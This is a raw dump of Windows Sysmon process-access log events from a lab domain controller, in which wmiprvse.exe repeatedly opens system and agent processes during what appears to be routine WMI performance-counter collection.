13:54:48.701{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3600-000000009101}3344C:\Windows\system32\wbem\unsecapp.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006600Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.701{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3500-000000009101}3240C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006599Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.701{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3500-000000009101}3240C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006598Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.701{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3400-000000009101}3224C:\Windows\system32\dfssvc.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006597Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.701{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3400-000000009101}3224C:\Windows\system32\dfssvc.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006596Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.701{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3300-000000009101}3080C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006595Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.701{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3300-000000009101}3080C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006594Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.701{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3200-000000009101}2472C:\Windows\system32\DFSRs.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006593Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.701{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3200-000000009101}2472C:\Windows\system32\DFSRs.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006592Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.701{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3100-000000009101}2528C:\Windows\System32\ismserv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006591Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.701{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3100-000000009101}2528C:\Windows\System32\ismserv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006590Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.701{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3000-000000009101}1548C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006589Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.701{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3000-000000009101}1548C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006588Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.701{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-2F00-000000009101}416C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006587Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.701{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-2F00-000000009101}416C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006586Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.701{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-2E00-000000009101}2212C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006585Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.701{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-2E00-000000009101}2212C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006584Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.701{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006583Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.701{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006582Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.701{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-2C00-000000009101}2484C:\Windows\system32\dns.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006581Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.701{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-2C00-000000009101}2484C:\Windows\system32\dns.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006580Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.701{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-2B00-000000009101}2636C:\Windows\System32\spoolsv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006579Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.701{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-2B00-000000009101}2636C:\Windows\System32\spoolsv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006578Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.701{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-854A-5FCF-2800-000000009101}2684C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006577Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 